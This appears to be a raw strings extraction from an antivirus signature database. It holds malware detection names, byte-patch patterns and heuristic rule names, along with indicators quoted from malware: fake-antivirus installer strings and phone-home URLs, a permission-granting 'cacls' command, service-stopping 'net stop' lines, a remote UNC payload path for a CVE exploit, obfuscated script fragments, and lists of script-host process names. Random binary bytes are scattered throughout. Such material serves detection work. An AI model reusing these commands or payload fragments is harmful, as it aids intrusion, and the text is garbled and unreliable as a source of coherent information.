!!#PEBMPAT:AntiEmuInstCountLimit !#PEBMPAT:Obfuscator_gv_exception !#lua_codepatch_sirefef_lasterror1 !#attrmatch_codepatch_EIP_00000006_EB !#attrmatch_codepatch_EIP_0000000A_EB !#attrmatch_codepatch_EIP_0000000D_EB< !#attrmatch_codepatch_EIP_0000000E_EB !#attrmatch_codepatch_EIP_00000010_7C !#attrmatch_codepatch_EIP_00000010_8E !#attrmatch_codepatch_EIP_00000018_72 !#attrmatch_codepatch_EIP_0000001A_ED !#attrmatch_codepatch_EIP_00000027_75 !#attrmatch_codepatch_EIP_00000004_31C9 !#attrmatch_codepatch_EIP_00000007_9090+ !#attrmatch_codepatch_EIP_00000008_9090 !#attrmatch_codepatch_EIP_00000008_90E9 !#attrmatch_codepatch_EIP_0000000C_EB02d TSERa` !#attrmatch_codepatch_EIP_0000000E_90903 !#attrmatch_codepatch_EIP_0000000E_EBF0 !#attrmatch_codepatch_EIP_00000010_33C0 !#attrmatch_codepatch_EIP_00000010_90E9 !#attrmatch_codepatch_EIP_00000012_9090^[ !#attrmatch_codepatch_EIP_00000013_9090`1 !#attrmatch_codepatch_EIP_00000014_9090PSj !#attrmatch_codepatch_EIP_00000015_9090Kf !#attrmatch_codepatch_EIP_00000015_9090PVR !#attrmatch_codepatch_EIP_00000017_9090` !#attrmatch_codepatch_EIP_00000053_9090h) !#attrmatch_codepatch_EIP_00000012_0090E9_ !#attrmatch_codepatch_EIP_00000001_10000000 !#attrmatch_codepatch_EIP_00000002_01000000S !#attrmatch_codepatch_EIP_00000003_02000000` !#attrmatch_codepatch_EIP_00000007_909090900 !#attrmatch_codepatch_EIP_0000000A_01000000# !#attrmatch_codepatch_EIP_0000000E_01000000 !#attrmatch_codepatch_EIP_00000010_89D39090M !#attrmatch_codepatch_EIP_0000000A_E97A000000 !#attrmatch_codepatch_EIP_0000000D_C60240EBEE !#attrmatch_codepatch_EIP_00000000_C1E81090909090 !#attrmatch_codepatch_EIP_00000000_8B0424909090909090 !#attrmatch_codepatch_EIP_00000000_8B0690909090909090 &!#PEBMPAT:Disable_SEH_Limit !#attrmatch_DTBranch_EIP_12_r1 #!#attrmatch_DTBranch_EIP_12_r1 !#attrmatch_DTBranch_EIP_B8_r1 #!#attrmatch_DTBranch_EIP_B8_r1 !#PEBMPAT:Deep_Analysis_VMM_Grow+ E !!#PEBMPAT:Deep_Analysis_VMM_Grow+ !#PEBMPAT:Deep_Analysis_VMM_Grow E !!#PEBMPAT:Deep_Analysis_VMM_Grow E! !#PEBMPAT:lua_codepatch_ursnif_64QRAPSVW !#attrmatch_codepatch_EIP_0000000A_00UVS !#attrmatch_codepatch_EIP_0000000D_84@ !#attrmatch_codepatch_EIP_00000013_EB !#attrmatch_codepatch_EIP_00000015_F4 !#attrmatch_codepatch_EIP_00000015_F4@ !#attrmatch_codepatch_EIP_00000016_EB !#attrmatch_codepatch_EIP_00000019_00 !#attrmatch_codepatch_EIP_00000019_EB !#attrmatch_codepatch_EIP_0000001A_EBU !#attrmatch_codepatch_EIP_0000001B_84 !#attrmatch_codepatch_EIP_00000003_9090 $Pg n Q<!V] l:O \\ Al6_q 9g<P6 *TMnu <N<+oF2A* M0c K fauM[ qRCZV By#v' hlp+m \t_&HU K?ct< Z)h> m0?NSA 2|K12 >xsC> _kc%v .Sq&( 6N^!1 GU'X? .9+.W !Q T ;ubWc'{ B.^Sj {|!`F ODq?U sjSsE4]8 |`XV%35 Dp. X d Lesbian http://www.lop.com/search/ http://www.lop.com/search/xa Bad Elmo < You must install this software as part of the parent program SwIcertifiEd -Curl %s -MpX%s Casino Online Web Hosting|hosting Penis Enlargement|Penis Enlargement Pill Buy Viagras Adult Education Breast Enhancement Breast Enhancement] !PornDialer.CEN !PornDialer.LOS !Egroupinstantaccess.IA !PornDialer.ISN !Harnig.EF !QQHelper.D \t16990.com bizmd.cn/ad/ADService.asmx $96C930FD-AE94-42D0-B638-6AF8C0930FCE $B9A367EC-4DE5-402A-87CF-7DEE8ADB00E5 CreateServiceA] !Egroupsexdial 0@y.?X@e GBNPx MonitoringTool:Win32/Messagedetect.A $MonitoringTool:Win32/Messagedetect.A !Vundo.AH !Pushbot.DD !Slenfbot.TZ !Slenfbot.UA !Slenfbot.UD !Slenfbot.UE !Slenfbot.UH !Slenfbot.UB !Slenfbot.UC !Slenfbot.UF !Slenfbot.UG !Renos.B &group=adv !Wazabre.A p@%h !Vundo.DG !Vundo.DH !Vundo.DI -zkL+ !Vundo.DJ !Vundo.DK !Vundo.DL !Vundo.DM !Vundo.DN !Vundo.DO !Vundo.DP !Vundo.DQ !Vundo.DR Killav.C !Vundo.DS !Vundo.FA net stop winss net stop OcHealthMon PSSj&S3 !Vundo.FB !Vundo.FC !Vundo.DT !Vundo.KE !Busky.J aV19D aV19D] !WinSpywareProtect !WinSpywareProtect_@* 42BD-A8CB-7E5 ://dl.%s/get/?pin= /scan. InternetOpenAa <.php? b/html, .TUNPROTECTEDCONFIRMFORM .TNETATTACKDETECTIONFORM SCAN_IMG TVIRUSDESCFORMa 9func=installrun&id=%s&landing=%s&lang=%s&sub=%s¬stat=1 /pay/%s/%s/ %exportdb.php?func=update&id=%s&pid=%s AMFILES>\\sniffem\\sniffem.exe ?type=%s&pin=%s&lnd=%s http://dl. /get/ /get/a; antispyprotector.com+stat.php?action=%d&affid=%s&pcid=%s&abbr=%s &%s\\AntiSpyProt.exe $%s\\AntiSpyMon.exe $AntiSpy Protector $Policies\\Explorer NoRunat Software\\\\LastSun Ltd.\\\\ -,%s scan for malware and remove found threats 1Illegal activation code! Recheck your input data! UTrojan-PSW.GOPtrojan!sd5 is a malicious application that attempts to steal passwords, <IM-Flooder.ToolzY2K!sd5 is a threat that is capable to cause RThis program is a new and improved approach to spyware identification and removal. RThis program is a new and improved approach to spyware identification and removal.g ?=J6' amX\tN X3F c ixe#x winspywareprotect ShellExecuteAx Installation of Smart Defender PRO in progress, please wait... %ssmrtdefp.exe abracadbra.jpg ids=%s&guid=%s&serial=%s&ntid=%s&build=%s func=scanfinished&id=%s exportdb.php?func=update&id=%s&pid=%s func=install& puid=%s& iplanding=%s 589;Win32/Rbot.IDN;Backdoor;4;Win32/Rbot.IDN is an IRC controlled backdoor vbase.bak vbase.dat vbase.tmp Update download complete Error occurs while downloading update: Error occurs while downloading update:x ee\td8 .winspywareprotect .WinSpywareProtect .com/addon/ .com/stat.php .malwarrior .com/addon \\Adsl Software Limited\\WinSpywareProtect \\Adsl Software Limited\\MalWarrior Software\\Adsl Software Limited\\Installer WinSpywareProtect installer WinSpywareProtect installerx Trojan.Folderfu!sd5 is a malicious program that does not infect other files but may represents security Worm.Small!sd5 is a network-aware worm that attempts to replicate across the existing network. Windows Security Center reports that %s is not registered ,%s scan for malware and remove found threats actDeleteVirusExecute% acIESniffer1WBFileDownload C:\\TEMP\\Upgrader3.exe http://www.avpro-labs.com/buy.html http://www.avpro-labs.com/buy.htmlx Ni=%s&g=%s&s=%s&n=%s&b=%s&z=%i&h=%i&o=OK kljhflk73#OO#*U$O(*YO PInstallation in progress, please wait... .com/dp/ pic.jpg Nw=%s&g=%s&x=%s&u=%s&n=%s&p=%i&s=%i&l=OK .net/dp/ .in/dp/ %ssdp.exe MT)V: tj F!d 2+Kv \\SmartDefender PRO.lnk_ \\WinSpywareProtect.lnk_ \\Virus Remover Pro..lnk_ \\Smart Defender PRO.lnk_ \\Antispy Protector 20??.lnk_ \\Computer Defender 20??..lnk_3 \\crucialsoft ltd\\ms antispyware 2009\\msas2009.exe_D \\solt lake software\\pro antispyware 2009\\log\\?????????????????.log_J \\Computer Defender 20??..lnk_3#\\crucialsoft ltd\\ms antispyware 2009\\msas2009.exe_D#\\solt lake software\\pro antispyware 2009\\log\\?????????????????.log_J \\Microsoft\\Internet Explorer\\Quick Launch\\Virus Remover Professional.lnk` \\LastSun Ltd` #\\LastSun Ltd` \\burstwriting` &\\burstwriting` \\AV AntiSpyware` \\Extra Antivirus` \\CrucialSoft Ltd` #\\CrucialSoft Ltd` \\P Antispyware 09` &\\P Antispyware 09` \\SmartDefender PRO` \\winspywareprotect` &\\winspywareprotect` \\Smart Defender PRO` \\Tally software LTD` #\\Tally software LTD` \\solt lake software` #\\solt lake software` \\pro antispyware 20??` \\adsl software limited` #\\adsl software limited` \\Antispy Protector 20??` \\Computer Defender 20??` &\\Computer Defender 20??` \\Programs\\winspywareprotect` \\Virus Remover Professional` \\Virus Remover Professionalc &\\Virus Remover Professionalc Software\\BurstWriting Software\\BurstWritingc Software\\CrucialSoft Ltd Software\\CrucialSoft Ltdc+ Software\\CrucialSoft Ltd\\upd\\\\Started %Software\\CrucialSoft Ltd\\upd\\\\Startedc2 Software\\Classes\\BurstWriting.BurstWriting.1 ,Software\\Classes\\BurstWriting.BurstWriting.1c7 SOFTWARE\\CrucialSoft Ltd\\MS AntiSpyware 2009\\\\lid 1SOFTWARE\\CrucialSoft Ltd\\MS AntiSpyware 2009\\\\lidcI Software\\Solt Lake Software\\Pro Antispyware 2009\\???\\\\Start Counter CSoftware\\Solt Lake Software\\Pro Antispyware 2009\\???\\\\Start CountercL software\\Solt Lake Software\\Pro Antispyware 2009\\???\\config\\\\(default) Fsoftware\\Solt Lake Software\\Pro Antispyware 2009\\???\\config\\\\(default)c_ Software\\Microsoft\\Windows\\CurrentVersion\\uninstall\\Pro Antispyware 2009 ???\\\\DisplayName YSoftware\\Microsoft\\Windows\\CurrentVersion\\uninstall\\Pro Antispyware 2009 ???\\\\DisplayName] !Vundo.FD !Vundo.FE !Vundo.FF !Vundo.FG !Vundo.FH !Vundo.FI !Vundo.FJ /go/?cmp=hstwtch red_green_test red_green_test] !Zlob.ANE if exist \"%s\" goto Repeat Software\\NetProject %s\\zf%s%d.exe _cls%d.bat /music.php?param= .chl\\CLSID yahoo.google.] !Vundo.FK !Vundo.FL !Vundo.FM !Vundo.FN !Vundo.FO !Renos.gen!AJ {78B578D7-BCE1-4d83-9CD4-195BC34D8CB3} '{78B578D7-BCE1-4d83-9CD4-195BC34D8CB3} *** STOP: 0x0000008E (0xC00 00005,0X8056EBA4,0xF7DD399C,0x00000000) *** STOP: 0x0000008E (0xC0000005,0X8056EBA4,0xF7DD399C,0x00000000)] !Vundo.FP !Slenfbot.UI !Slenfbot.UJ !Vundo.FQ !Vundo.FT !Vundo.FV !Vundo.FS !Vundo.FR !Pushbot.DE !Slenfbot.UK !Slenfbot.UL !Vundo.FW !Slenfbot.UM !Vundo.FX !Vundo.FY !Vundo.FZ !Vundo.FAA !Vundo.FAB !Zlob.AMQ GetSystemDefaultLCID #785ujthgfrw34676utyj !Bagle.SE !Renos.FB !Vundo.FAC !Vundo.FU !Conhook.J !Conhook!dam MonitoringTool:Win32/RevealerKeylogger &MonitoringTool:Win32/RevealerKeylogger ,Revealer Keylogger Pro _LowLevelKeyboardProc@ _LowLevelKeyboardProc@g BB\")J CompanyNamewww.revealerkeylogger.com FileDescriptionRevealer Keylogger Revealer is currently monitoring, are you sure you want to quit 3www.revealerkeylogger.com ProductNameRevealer Keylogger 3Revealer Keylogger report rkfree.exe \\rvlkl] #\\rvlkl] !Matcash.gen!H !Vundo.FAD !Lowzones.GU !Small.AABA !Slenfbot.UN !Small.HC !Small.HD cmd /c cacls %s /e /p everyone:f killrdog killerdog killdog killrdogkillerdogkilldog %ProgramFiles%\\Outlook Express\\msoeres2.dll WinExec] !Small.HH d3bYF. fCPmc nA%0A l3\\`\\ bsZjd 7Zdv$W V7y;O fn*=- 4\"5bR 2DE[d l)|z2 5sHYUPG ,\\\\ ; ip%xl {k'z) gJ9I ( #[]M$ cbQpD W^?q8 \"Q\"][ k6L7z yp7Hn #r*Ik z_W-- o(H4F HujnJ- M8Hr\t p'O#}\t 7Kn) F1tt| ^f2ea HJZzp V}b4A sCyb# wwaf5R4 R:sf; OYqMtA \t W YR 04Wt1 _uCq]a #Q;YD !CxZd} !~KnF W@T$ \\A_GK XdY\"HZ J !#SCPT:JS/Obfuscator.LongNames.B J!!#SCPT:VirTool:SWF/Obfuscator.F.2 J#!#SCPT:JS/Obfuscator.Split.length.A \"le\") #!#SCPT:JS/Obfuscator.SplitReverse.A J#!#SCPT:JS/Obfuscator.SplitReverse.A .split('').reverse().pop() J$!#SCPT:JS/Obfuscator.DecimalString.A 0-9\") &!#BRUTE:Exploit:Python/CVE-2017-0143.6 J&!#BRUTE:Exploit:Python/CVE-2017-0143.6 got good ECHO responses '!#SCRIPT:Exploit:Win32/CVE-2014-4114-ip J'!#SCRIPT:Exploit:Win32/CVE-2014-4114-ip \\\\37.143.15.171\\update J,!#SCPT:JS/Obfuscator.Split.InnerAssignment.A ; return '\",\" J-!#SCPT:JS/Obfuscator.Redundancy.EmptyQuotes.A +\"\"+(\" 1!#SCPT:JS/Obfuscator.BASE64EncScript.saveToFile.A J1!#SCPT:JS/Obfuscator.BASE64EncScript.saveToFile.A c2F2ZVRvRmls !#BRUTE:NSISInetc /MainSection \\nsWeb.dll \\nsWeb.dllhttp:// !#TELPER:FileTourInno.A dll:files:license.key itd_downloadfile )dll:files:license.keyitd_downloadfile \"%\"+\"T $\"%\"+\"T !#SCPT:JS/Obfuscator.Spaced.D } #} } } #\"G\" + , \"http\" , \"http\" () + \"GE\" + #\"GE\" + , \"htt\" , \"htt\" #\"GE\" , \"htt\" + , \"htt\" + !#ALF:Trojan:Python/Banker.VC2 lambda \"lambda [1]^ [0]% !#SCPT:JS/BASE64.Compression.U QwBvAG0AcAByAGUAcwBzAGkAbwBuAC4A \"QwBvAG0AcAByAGUAcwBzAGkAbwBuAC4A bQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUA \"bQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUA bwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQA \"bwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQA !#SCPT:JS/Obfuscator.HexMixed.F Dir%5B%22open%22%5D%28%22GET%22 !Dir%5B%22open%22%5D%28%22GET%22 K !#Trojan:PowerShell/Reflection.A System.Reflection.AssemblyName System.Reflection.AssemblyName K#!#SCPT:JS/Obfuscator.Split.String.A St\"+\"r K#!#SCPT:JS/Obfuscator.Split.length.A \"ngt\" %!#SCPT:PossiblyClean:AdminTools.URL.A K%!#SCPT:PossiblyClean:AdminTools.URL.A admintools.3utilities.com K'!#SCPT:JS/Obfuscator.Capslock.WScript.A PT.sH Pt.SH Pt.Sh Pt.sH Pt.sh RIPt. RIpT. RIpt. RiPT. RiPt. RipT. Ript. pT.SH pT.Sh pT.sH pT.sh pt.sH rIPT. rIPt. rIpT. rIpt. riPT. riPt. ripT. +!#BRUTE:Python/Leivion.C.CreateRemoteThread K+!#BRUTE:Python/Leivion.C.CreateRemoteThread +!#BRUTE:Python/Leivion.C.WriteProcessMemory K+!#BRUTE:Python/Leivion.C.WriteProcessMemory K,!#SCPT:JS/Obfuscator.Split.InnerAssignment.A +='=\" ] = '= ]='=\" /!#SCPT:JS/Obfuscator.Reversed.ExecutionPolicy.A K/!#SCPT:JS/Obfuscator.Reversed.ExecutionPolicy.A yciloPnoitucexE !#SCRIPT:FakeCert!AT !#SCRIPT:FakeCert!Ce !#SCRIPT:FakeCert!MS !#SCRIPT:FakeCert!OT !#SCRIPT:FakeCert!VS !#SCPT:s_codescript.A You may add or alter any code config here. ,You may add or alter any code config here. $\"G\" + , \"http:\" , \"http:\" Bad offset for JScript BYTE read. #Bad offset for JScript BYTE read. A-Za-z_ !#Exploit:Win32/CVE-2015-0097.A1 L !#Exploit:Win32/CVE-2015-0097.A1 MSScriptControl.ScriptControl.1 !MSScriptControl.ScriptControl.1 !#SCPT:TeslaCryptEncryptedFile.1 L !#SCPT:TeslaCryptEncryptedFile.1 \"!#SCPT:JS/Obfuscator.LongVarName.C L\"!#SCPT:JS/Obfuscator.LongVarName.C ()[0] + #!#//SCPT:DigitalSignature.COMODO.CA L#!#//SCPT:DigitalSignature.COMODO.CA COMODO RSA Code Signing CA L#!#SCPT:JS/Obfuscator.Split.concat.A 'c'+\"o L$!#SCPT:JS/Obfuscator.DecimalString.A \")] = L,!#SCPT:JS/Obfuscator.Split.InnerAssignment.A : 'var '}[' 000273626a7702 010372636b7603 02007160687500 03017061697401 040677666e7306 050776676f7207 060475646c7104 070574656d7005 080a7b6a627f0a 090b7a6b637e0b 0a087968607d08 0b097869617c09 0c0e7f6e667b0e 0d0f7e6f677a0f 0e0c7d6c64790c 0f0d7c6d65780d 101263727a6712 111362737b6613 12106170786510 13116071796411 141667767e6316 151766777f6217 161465747c6114 171564757d6015 181a6b7a726f1a 191b6a7b736e1b 1a186978706d18 1b196879716c19 1c1e6f7e766b1e 1d1f6e7f776a1f 1e1c6d7c74691c 1f1d6c7d75681d 303243525a4732 313342535b4633 32304150584530 33314051594431 343647565e4336 353746575f4237 363445545c4134 373544555d4035 383a4b5a524f3a 393b4a5b534e3b 3a384958504d38 3b394859514c39 3c3e4f5e564b3e 3d3f4e5f574a3f 3e3c4d5c54493c 3f3d4c5d55483d 404233222a3742 414332232b3643 42403120283540 43413021293441 444637262e3346 454736272f3247 464435242c3144 474534252d3045 484a3b2a223f4a 494b3a2b233e4b 4a483928203d48 4b493829213c49 4c4e3f2e263b4e 4d4f3e2f273a4f 4e4c3d2c24394c 4f4d3c2d25384d 505223323a2752 515322333b2653 52502130382550 53512031392451 545627363e2356 555726373f2257 565425343c2154 575524353d2055 585a2b3a322f5a 595b2a3b332e5b 5a582938302d58 5b592839312c59 5c5e2f3e362b5e 5d5f2e3f372a5f 5e5c2d3c34295c 5f5d2c3d35285d 606213020a1762 616312030b1663 62601100081560 636110010 \\appdata\\locallow\\{........%-....%-....%-....%-............} =\\appdata\\locallow\\{........%-....%-....%-....%-............} Lua:BedepFileName.A cryptbase.dll Lua:BedepFileName.B api-ms- Lua:BedepFileName.C \\programdata\\{9a88e103-a20a-4ea5-8636-c73b709a5bf8} 4\\programdata\\{9a88e103-a20a-4ea5-8636-c73b709a5bf8} \\programdata\\{f66cb4ee-546f-4d54-9332-216de189aab0} 4\\programdata\\{f66cb4ee-546f-4d54-9332-216de189aab0} \\programdata\\{698e0848-6d29-4305-80dc-e8d609260ce2} 4\\programdata\\{698e0848-6d29-4305-80dc-e8d609260ce2} \\programdata\\{49a0bac7-3326-4433-9373-4aa8793abb5c} 4\\programdata\\{49a0bac7-3326-4433-9373-4aa8793abb5c} \\programdata\\{effc3e07-aed7-4c3c-992f-2c5eb14af4a8} 4\\programdata\\{effc3e07-aed7-4c3c-992f-2c5eb14af4a8} \\programdata\\{d9e629dc-cb1c-4a97-9900-81922b4effd4} 4\\programdata\\{d9e629dc-cb1c-4a97-9900-81922b4effd4} \\programdata\\{ca2facf7-9029-4a21-892b-e7f60b39ff1a} 4\\programdata\\{ca2facf7-9029-4a21-892b-e7f60b39ff1a} \\programdata\\{4ba6ab29-2eab-46fc-8b33-a767b5dbb0f3} 4\\programdata\\{4ba6ab29-2eab-46fc-8b33-a767b5dbb0f3} \\application data\\{4d03d701-c800-49f0-8590-127eff2877ff} 9\\application data\\{4d03d701-c800-49f0-8590-127eff2877ff} \\programdata\\{9b82496a-c211-4fcf-84b5-e2b3a1d99f8f} 4\\programdata\\{9b82496a-c211-4fcf-84b5-e2b3a1d99f8f} \\programdata\\{d93bcbeb-07b6-4fa0-86bf-5552dfc4404c} 4\\programdata\\{d93bcbeb-07b6-4fa0-86bf-5552dfc4404c} \\programdata\\{65ee3202-cce0-4ec4-9369-0a126e1da09c} 4\\programdata\\{65ee3202-cce0-4ec4-9369-0a126e1da09c} \\programdata\\{b7a719fb-068f-41ad-8261-3569c22edec2} 4\\programdata\\{b7a719fb-068f-41ad-8261-3569c22edec2} \\programdata\\{18067bd7-3c56-4e2e-8627-51ee9adc5a30} 4\\programdata\\{18067bd7-3c56-4e2e-8627-51ee9adc5a30} \\programdata\\{1016e27d-c6ce-4668-9211-5ec18caadbf8} 4\\programdata\\{1016e27d-c6ce-4668-9211-5ec18caadbf8} \\programdata\\{39567fd8-2a86-4514-8b0a-406c6e60a8bb} 4\\programdata\\{39567fd8-2a86-4514-8b0a-406c6e60a8bb} \\programdata\\{9925001e-4d97-434f-8579-2e06af34678f} 4\\programdata\\{9925001e-4d97-434f-8579-2e06af34678f} \\programdata\\{0bf6ab17-0058-462c-8274-0655b925c812} 4\\programdata\\{0bf6ab17-0058-462c-8274-0655b925c812} \\programdata\\{a4682c3b-ab83-49b3-8eb5-b44e3f044b59} 4\\programdata\\{a4682c3b-ab83-49b3-8eb5-b44e3f044b59} \\programdata\\{0a41da87-d172-4c26-9422-d2c4f5549861} 4\\programdata\\{0a41da87-d172-4c26-9422-d2c4f5549861} \\programdata\\{2cd18189-70a0-4ae9-899e-05bad272e52e} 4\\programdata\\{2cd18189-70a0-4ae9-899e-05bad272e52e} \\programdata\\{33896b39-667b-48e5-8c29-b02174b09d04} 4\\programdata\\{33896b39-667b-48e5-8c29-b02174b09d04} \\programdata\\{2f752dac-f812-4497-9e91-d8701a4745cb} 4\\programdata\\{2f752dac-f812-4497-9e91-d8701a4745cb} \\programdata\\{9cad18b2-ff9b-4cca-8ee0-a4cda3ad5f51} 4\\programdata\\{9cad18b2-ff9b-4cca-8ee0-a4cda3ad5f51} Lua:BedepFileName.D \\programdata\\{........%-....%-....%-....%-............}\\$ :\\programdata\\{........%-....%-....%-....%-............}\\$ Lua:BedepFileName.E spinstall.exewdscore.dll Lua:BedepFileName.F !#Lua:InterestingRARFlagsEx Lua:RarHasFileNameWithPassword Lua:RarHasEncryptedFile Lua:RarHasStoredFileWithExeExtension %Lua:RarHasStoredFileWithExeExtension RPF:AnyFileHasIOAVURL Lua:RarHasSingleStoredFileWithExeExtension +Lua:RarHasSingleStoredFileWithExeExtension //Lua:GIOAVTopLevelRarHasSingleStoredFileWithExeExtension ://Lua:GIOAVTopLevelRarHasSingleStoredFileWithExeExtension //Lua:GIOAVTopLevelRarHasSingleFileWithExeExtension 4//Lua:GIOAVTopLevelRarHasSingleFileWithExeExtension Lua:RarHasSingleFileWithExeExtension %Lua:RarHasSingleFileWithExeExtension Lua:RarHasCommentBlock Lua:RarHasStoredFile [Pp][Aa][Ss][Ss][Ww][Oo][Rr][Dd] ![Pp][Aa][Ss][Ss][Ww][Oo][Rr][Dd] [Tt][Oo] [Oo][Pp][Ee][Nn] to open enter 1234 1 2 3 4 Lua:RarHasMizenotaPWFile Lua:RarHasEncryptedFileWithExeExtension (Lua:RarHasEncryptedFileWithExeExtension UEFIEnvVar ScanAllUefiEnvVars IsUefiEnvVarScanSupported IsUefiEnvVarScanExcluded Infrastructure_ScanUefiEnvironmentVariables ,Infrastructure_ScanUefiEnvironmentVariables EnumerateFirmwareEnvironmentVariables &EnumerateFirmwareEnvironmentVariables {8be4df61-93ca-11d2-aa0d-00e098302288} '{8be4df61-93ca-11d2-aa0d-00e098302288} roodkcaBdrauGifE {8be4df61-93ca-11d2-aa0d-00e098032b8c} '{8be4df61-93ca-11d2-aa0d-00e098032b8c} EfiGuardBackdoor setup {ec87d643-eba4-4bb5-a1e5-3f3e36b20da9} '{ec87d643-eba4-4bb5-a1e5-3f3e36b20da9} stddefaults {4599d26f-1a11-49b8-b91f-858745cff824} '{4599d26f-1a11-49b8-b91f-858745cff824} backdoor \tbackdoor loaded {26153152-363d-1670-8d94-47a9fa8c4c16} '{26153152-363d-1670-8d94-47a9fa8c4c16} backdoordataaddress parseUefiEnvVarSig reportUefiEnvVar VarName VarGuid VarAttributes VarFullValueSize VarValue \tVarValue uefienvvar %s:%s ReportLowfiEx GetFirmwareEnvironmentVariable MpNonExistentUefiVarName {0718a447-42c8-4591-9c76-b55112ef2430} '{0718a447-42c8-4591-9c76-b55112ef2430} hklm\\Hardware\\Description\\System\\Bios &hklm\\Hardware\\Description\\System\\Bios BIOSVendor BaseBoardManufacturer SystemManufacturer !#Lua:SuspFileDropByCleanStubs !#Lua:SuspFileDropByCleanStubsObMpAttributes cscript.exe|wscript.exe|mshta.exe|cmd.exe|powershell.exe|pwsh.exe|console.exe|bash.exe|dllhost.exe|rundll32.exe|regsvr32.exe|wmiprvse.exe Lua:StubApp! Lua:StubAppDropped! Lua:StubAppDroppedExt! obj|etl|log|pdb|edb|mdb|sdb|pdf|tmf|emf|wmf|spl|off|bak|m4a|mp4|mp3|wav|bmp|ico|kgx|idx|.md|tml|tar|ent|iff|ttf|tif|pak|aml|yml|mof|man|che|ore|new BM_PeFileDropByStubApp BM_LnkFileDropByStubApp BM_ScriptFileDropByStubApp \\bin\\debug ladybug.-%.ghuser \\bin\\release \\windows\\ccm\\systemtemp \\smssig \\sccmcontentlib\\ \\gac\\gac_msil\\ \\device\\vhdharddisk \\bin\\azure.+ microsoft%.microsoftedge.-default\\cachestorage\\files 5microsoft%.microsoftedge.-default\\cachestorage\\files moduleanalysiscache powershell_analysiscacheentry windowsdefenderatponboardingscript.cmd 'windowsdefenderatponboardingscript.cmd retainip-log.txt min%[.%]%.js %.xml$ %.json$ %.yaml$ %.md$ Lua:CleanStubsExcludePath windows\\temp Lua:StubAppDroppedIn!wintemp users\\.-\\appdata\\local Lua:StubAppDroppedIn!localappdata \"Lua:StubAppDroppedIn!localappdata users\\.-\\appdata\\remote Lua:StubAppDroppedIn!remoteappdata #Lua:StubAppDroppedIn!remoteappdata users\\.-\\appdata\\local\\temp Lua:StubAppDroppedIn!usrtemp users\\.-\\desktop$ Lua:StubAppDroppedIn!usrdesktop Lua:StubAppDroppedIn!usrdesktop users\\.-\\documents$ Lua:StubAppDroppedIn!usrdocs windows\\inetcache Lua:StubAppDroppedIn!inetcache !#Lua:SuspExeFNameLoc \\local\\temp Microsoft Corp Citrix Systems Google Inc Firefox and Mozilla Developers Adobe Systems All Alex \tAll Alex Maple Studio The Chromium Authors acrord32.exe hh.exe isuninst.exe notepad.exe regedit.exe slrundll.exe taskman.exe twunk_16.exe winhelp.exe winhlp32.exe bfsvc.exe fveupdate.exe helppane.exe write.exe splwow64.exe secedit.exe calc.exe \tcalc.exe taskmgr.exe runonce.exe certutil.exe find.exe \tfind.exe winver.exe ctfmon.exe powercfg.exe tcpsvcs.exe msfeedssync.exe dllhst3g.exe sfc.exe upnpcont.exe wiaacmgr.exe mspaint.exe xcopy.exe logagent.exe wextract.exe cmmon32.exe dpnsvr.exe net1.exe \tnet1.exe dplaysvr.exe dvdupgrd.exe fixmapi.exe systray.exe mobsync.exe unregmp2.exe \\application data\\[^\\]+$ \\appdata\\roaming\\[^\\]+$ installer citrix Lua:SuspiciousExeLegitNameInAppdata $Lua:SuspiciousExeLegitNameInAppdata \\local\\temp$ \\local settings\\temp$ Lua:SuspiciousExeLegitNameInTemp !Lua:SuspiciousExeLegitNameInTemp !#LUA:Trojan:Win32/FarAce.gen !#LUA:Trojan:Win32/FarAce.genObMpAttributes ntTypeEncode WintrustCertificateTrust mscat32DllRegisterServer mscat32DllUnregisterServer mssip32DllRegisterServer mssip32DllUnregisterServer CryptCATAdminAcquireContext CryptCATAdminAddCatalog CryptCATAdminCalcHashFromFileHandle CryptCATAdminEnumCatalogFromHash CryptCATAdminPauseServiceForBackup CryptCATAdminReleaseCatalogContext CryptCATAdminReleaseContext CryptCATAdminRemoveCatalog CryptCATAdminResolveCatalogPath CryptCATCDFClose CryptCATCDFEnumAttributes CryptCATCDFEnumCatAttributes CryptCATCDFEnumMembers CryptCATCDFEnumMembersByCDFTagEx CryptCATCDFOpen CryptCATCatalogInfoFromContext CryptCATClose CryptCATEnumerateAttr CryptCATEnumerateCatAttr CryptCATEnumerateMember CryptCATGetAttrInfo CryptCATGetCatAttrInfo CryptCATGetMemberInfo CryptCATHandleFromStore CryptCATOpen CryptCATPersistStore CryptCATPutAttrInfo CryptCATPutCatAttrInfo CryptCATPutMemberInfo CryptCATStoreFromHandle CryptSIPCreateIndirectData CryptSIPGetSignedDataMsg CryptSIPPutSignedDataMsg CryptSIPRemoveSignedDataMsg CryptSIPVerifyIndirectData FindCertsByIssuer IsCatalogFile OpenPersonalTrustDBDialog OpenPersonalTrustDBDialogEx WTHelperCertCheckValidSignature WTHelperCertIsSelfSigned WTHelperGetProvCertFromChain WTHelperGetProvPrivateDataFromChain WTHelperGetProvSignerFromChain WTHelperProvDataFromStateData WinVerifyTrust WinVerifyTrustEx WintrustAddActionID WintrustAddDefaultForUsage WintrustGetDefaultForUsage WintrustGetRegPolicyFlags WintrustLoadFunctionPointers WintrustRemoveActionID WintrustSetRegPolicyFlags ntTypeEncodeWintrustCertificateTrustmscat32DllRegisterServermscat32DllUnregisterServermssip32DllRegisterServermssip32DllUnregisterServerCryptCATAdminAcquireContextCryptCATAdminAddCatalogCryptCATAdminCalcHashFromFileHandleCryptCATAdminEnumCatalogFromHashCryptCATAdminPauseServiceForBackupCryptCATAdminReleaseCatalogContextCryptCATAdminReleaseContextCryptCATAdminRemoveCatalogCryptCATAdminResolveCatalogPathCryptCATCDFCloseCryptCATCDFEnumAttributesCryptCATCDFEnumCatAttributesCryptCATCDFEnumMembersCryptCATCDFEnumMembersByCDFTagExCryptCATCDFOpenCryptCATCatalogInfoFromContextCryptCATCloseCryptCATEnumerateAttrCryptCATEnumerateCatAttrCryptCATEnumerateMemberCryptCATGetAttrInfoCryptCATGetCatAttrInfoCryptCATGetMemberInfoCryptCATHandleFromStoreCryptCATOpenCryptCATPersistStoreCryptCATPutAttrInfoCryptCATPutCatAttrInfoCryptCATPutMemberInfoCryptCATStoreFromHandleCryptSIPCreateIndirectDataCryptSIPGetSignedDataMsgCryptSIPPutSignedDataMsgCryptSIPRemoveSignedDataMsgCryptSIPVerifyIndirectDataDllRegisterServerDllUnregisterServerFindCertsByIssuerIsCatalogFileOpenPersonalTrustDBDialogOpen